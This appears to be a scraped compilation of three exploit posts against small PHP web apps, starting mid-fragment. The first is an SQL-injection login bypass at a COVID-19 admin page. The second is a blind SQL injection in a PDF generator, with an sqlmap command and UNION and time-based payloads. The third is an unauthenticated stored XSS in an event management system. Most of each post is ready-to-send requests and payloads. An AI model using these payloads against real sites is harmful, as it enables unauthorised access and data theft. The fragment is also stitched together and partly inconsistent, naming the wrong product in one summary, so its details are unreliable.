/>POST /covid-19/admin/login.php HTTP/1.1<br />Host: 0day.gov<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 72<br />Origin: http://0day.gov<br />Connection: close<br />Referer: http://0day.gov/covid-19/admin/login.php<br />Cookie: PHPSESSID=c9sbs70le23qois1riekoj8osg<br />Upgrade-Insecure-Requests: 1<br />txtusername=admin%27or+1%3D1+or+%27%27%3D%27&txtpassword=hejap&btnlogin=<br />---<br /><br />#Blind SQLi Time to Rce<br />#ُExploit <br /><br /><br /># Description:<br />The SQLi vulnerability We can use this information to construct an injection attack to bypass authentication.<br /><br /><br /># Proof and Exploit:<br /><br />https://i.imgur.com/oDj69Hw.png<br />https://i.imgur.com/JO4SLxa.png<br />https://i.imgur.com/kYgU7xl.png<br /><br /></code></pre>
<pre><code># Exploit Title: PDF Generator Web Application - 'multiple' Blind SQL Injection<br /># Date: 26/03/2022<br /># Exploit Author: Saud Alenazi<br /># Vendor Homepage: https://www.sourcecodester.com/<br /># Software Link: https://www.sourcecodester.com/php/15243/pdf-generator-web-app-using-tcpdf-and-phpoop-free-source-code.html<br /># Version: 1.0<br /># Tested on: XAMPP, Linux<br /># Contact: https://twitter.com/dmaral3noz<br /><br /><br /># Vulnerable Code<br /><br />line 23 in file "/pdf_generator/action.php"<br /><br />$check = $this->conn->query("SELECT * FROM `file_list` where `name` = '{$name}' ".(!empty($id) ? " and id != '{$id}' " : '')." ")->num_rows;<br /><br /># Sqlmap command:<br /><br />sqlmap -u 'http://localhost/pdf_generator/?page=manage_file&id=1' -p id --level=5 --risk=3 --dbs --random-agent --eta --batch<br /><br /># Output:<br /><br />Parameter: id (GET)<br /> Type: boolean-based blind<br /> Title: OR boolean-based blind - WHERE or HAVING clause (NOT)<br /> Payload: page=manage_file&id=1' OR NOT 3770=3770-- axnO<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: page=manage_file&id=1' AND (SELECT 3918 FROM (SELECT(SLEEP(5)))yLgc)-- fCtI<br /><br /> Type: UNION query<br /> Title: Generic UNION query (NULL) - 8 columns<br /> Payload: page=manage_file&id=1' UNION ALL SELECT CONCAT(0x71707a6a71,0x436a57436257674a6f4264524d524c4c4c6755634145724d4f545270794d7376774c44444c4d4545,0x717a767a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -<br /></code></pre>
<pre><code># Exploit Title: Royale Event Management System 1.0 - Cross-site Scripting<br />Stored (unauthenticated)<br /># Date: 17/03/2022<br /># Exploit Author: Mr Empy<br /># Software Link:<br />https://www.sourcecodester.com/php/15225/church-management-software-free-download-full-version.html<br /># Version: 1.0<br /># Tested on: Linux<br /><br />Title:<br />================<br />Royale Event Management System 1.0 - Cross-site Scripting Stored<br />(unauthenticated)<br /><br /><br />Summary:<br />================<br />One Church Management System is affected by Cross-site Scripting<br />vulnerability due to poor hygiene in certain parameters. The attacker could<br />leverage this flaw to inject arbitrary javascript code to manipulate the<br />victim's browser capabilities.<br /><br /><br />Severity Level:<br />================<br />6.5 (Medium)<br />CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N<br /><br /><br />Affected Product:<br />================<br />Royale Event Management System v1.0<br /><br /><br />Steps to Reproduce:<br />================<br /><br />* companyprofile.php XSS (unauthenticated) PoC:<br /><br />POST /royal_event/companyprofile.php HTTP/1.1<br />Host: target.com<br />Content-Length: 187<br />Cache-Control: max-age=0<br />Upgrade-Insecure-Requests: 1<br />Origin: http://target.com<br />Content-Type: application/x-www-form-urlencoded<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like<br />Gecko) Chrome/95.0.4638.69 Safari/537.36<br />Accept:<br />text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Referer: http://target.com/royal_event/churchprofile.php<br />Accept-Encoding: gzip, deflate<br />Accept-Language: pt-PT,pt;q=0.9,en-US;q=0.8,en;q=0.7<br />Connection: close<br /><br />companyname="><script>alert("XSS")</script>&regno="><script>alert("XSS")</script>&companyaddress="><script>alert("XSS")</script>&companyemail="><script>alert("XSS")</script>&country=India&mobilenumber=%2B919423979339&submit=<br /></code></pre>